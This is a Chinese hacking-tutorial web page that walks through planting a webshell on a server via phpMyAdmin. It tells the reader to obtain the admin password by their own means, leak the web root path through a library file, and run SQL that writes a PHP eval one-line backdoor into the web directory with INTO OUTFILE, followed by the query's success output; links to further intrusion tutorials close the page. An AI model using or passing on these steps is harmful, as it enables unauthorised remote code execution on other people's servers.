手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你phpMyAdmin 后台拿webshell
教你phpMyAdmin 后台拿webshell
摘要:1.如何拿到登陆密码,自己想办法。2.访问:http://url/phpmyadmin/libraries/select_lang.lib....

1.如何拿到登陆密码,自己想办法。

2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

3.选择一个Database.运行以下语句.

----start code---

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');

select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';

Drop TABLE IF EXISTS a;

----end code---

4.如果没什么意外.对应网站得到webshell

您运行的 SQL 语句已经成功运行了。

SQL 查询:

CREATE TABLE a(

cmd text NOT NULL

);# MySQL 返回的查询结果为空(即零行)。

INSERT INTO a( cmd )

VALUES (

'<?php eval($_POST[1]);?>'

);# 影响列数: 1

SELECT cmd

FROM a

INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1

DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。

【教你phpMyAdmin 后台拿webshell】相关文章:

系统漏洞溢出攻击实例(图)

一次SA权限入侵和小议SA提权

解析暴库漏洞原理及规律

中小网站如何对付拒绝服务攻击

最经典的黑客入门教程(安全必备技能)

hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁)

教你两句话 动网8.20的后台被拿下

仅用U盘就可以去除XP管理员密码

教你如何通过Mysql弱口令得到系统权限

利用windows自带功能做永不被查杀的下载者(超小体积)!

精品推荐
分类导航